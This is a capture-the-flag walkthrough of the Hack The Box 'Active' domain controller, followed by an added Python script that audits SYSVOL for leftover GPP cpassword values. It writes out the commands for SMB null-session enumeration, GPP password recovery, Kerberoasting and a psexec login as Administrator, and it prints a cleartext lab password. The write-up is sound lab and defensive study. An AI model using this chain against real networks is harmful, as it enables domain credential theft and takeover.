# HTB Series - Active

###### tags: `htb` `active` `windows` `walkthrough`

We start by scanning the target with nmap to find open ports:

```
nmap -sC -sV -oA active 10.10.10.100
```

![image](https://hackmd.io/_uploads/r1SCgLyIC.png)

Since we can see DNS (53), LDAP and SMB (445), we are likely on a Windows server. Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.

```
smbclient -L //10.10.10.100
```

![image](https://hackmd.io/_uploads/ryP9YIJ8R.png)

The IPC$ and SYSVOL shares are expected of a domain controller. smbmap offers similar results:

![image](https://hackmd.io/_uploads/Byriq8yUC.png)

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

```
smbmap -H 10.10.10.100 -r Replication --depth 8
# --depth accomplishes what a recursive flag would; 8 was an estimate of how deep we would have to go.
```

![image](https://hackmd.io/_uploads/HkTNJuyIR.png)

The output depicts the presence of the Groups.xml file, which is of interest to us, so we download it.

```
smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml
# -A acquires (downloads) files matching the specified pattern
```

![image](https://hackmd.io/_uploads/Skbcyu1UA.png)

From the downloaded file we identify the credentials as follows:

![image](https://hackmd.io/_uploads/SyDCRw1UA.png)

We decrypt the password as shown:

![image](https://hackmd.io/_uploads/ry5-xuJLR.png)

An alternate way to get this would be to use smbclient:

```
smbclient //10.10.10.100/Replication
Password for [WORKGROUP\cypher]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

![image](https://hackmd.io/_uploads/rJ0HMukI0.png)

![image](https://hackmd.io/_uploads/By7nMu1LA.png)

We then use impacket to view the users on the domain:

```
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs
```

![image](https://hackmd.io/_uploads/SybZcuJU0.png)

We try further enumeration using the given user account as follows:

```
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for host
```

![image](https://hackmd.io/_uploads/HJ0Vou1LA.png)

We utilize the credentials gathered as follows. On a Windows box, open up a session as the user:

```
runas /netonly /user:active.htb\svc_tgs cmd
```

![image](https://hackmd.io/_uploads/ByKT2_gLA.png)

We can use BloodHound to proceed as follows. Run SharpHound on the Windows box:

![image](https://hackmd.io/_uploads/HyADjtg8C.png)

Verify the connection is working:

![image](https://hackmd.io/_uploads/HyD5iKg8C.png)

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

![image](https://hackmd.io/_uploads/H1hwAKxLA.png)

From BloodHound we query which accounts are susceptible to Kerberoasting:

![image](https://hackmd.io/_uploads/BJmA-qxLC.png)

Attempt at Kerberoasting:

![image](https://hackmd.io/_uploads/By0dZqe8R.png)

From the hash acquired, we can look up the example hashcat hashes to find out the cracking mode to use:

![image](https://hackmd.io/_uploads/rJY1m9lIA.png)

We can then proceed to attempt to crack the hash with hashcat:

![image](https://hackmd.io/_uploads/Bkcfv5eI0.png)

![image](https://hackmd.io/_uploads/ByGZv9x8C.png)

We then proceed to use the credentials acquired to log in as the Administrator via psexec:

```
psexec.py domain/User@ip
```

![image](https://hackmd.io/_uploads/HJAEd5xLC.png)

Own the root flag:

![image](https://hackmd.io/_uploads/H1kCuce80.png)
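The Groups.xml finding above, seen from the defender's side: an added example (not part of the original walkthrough) that audits a copy of the SYSVOL Policies tree for any Group Policy Preference element still carrying a `cpassword` attribute. The XML samples are constructed here, the cpassword value is a placeholder, and `audit_sysvol()` assumes it is pointed at a local copy of the tree such as the one `mget *` pulls down.

```python
# Added example: audit Group Policy Preference XML for stored cpassword values.
# The GPP AES key is public (MS14-025), so any non-empty cpassword is a credential
# exposure; this only reports that a value is present and never decodes it.
import xml.etree.ElementTree as ET
from pathlib import Path

# Attributes that name the account a GPP cpassword belongs to (Groups, ScheduledTasks, DataSources).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element with a non-empty cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpassword = elem.get("cpassword")
        if not cpassword:  # attribute absent or already cleared by remediation
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "cpassword_len": len(cpassword)})
    return findings


def audit_sysvol(root_dir):
    """Walk a local SYSVOL copy and collect cpassword findings from every parseable XML file."""
    findings = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except (OSError, UnicodeDecodeError, ET.ParseError):
            continue  # unreadable or non-XML files are skipped, not fatal
    return findings


# Constructed sample: a Groups.xml that still carries a cpassword (placeholder value).
EXPOSED_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_CPASSWORD" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""

# Constructed sample: the same preference after the password was removed from the GPO.
REMEDIATED_GROUPS_XML = EXPOSED_GROUPS_XML.replace(' cpassword="PLACEHOLDER_BASE64_CPASSWORD"', "")

if __name__ == "__main__":
    for f in find_cpasswords(EXPOSED_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: <{f['element']}> for {f['account']} stores a cpassword")
    print("after remediation:", find_cpasswords(REMEDIATED_GROUPS_XML, "Groups.xml"))
```

Run `audit_sysvol()` against a copy of the Policies tree after the GPO has been fixed; a clean tree returns an empty list.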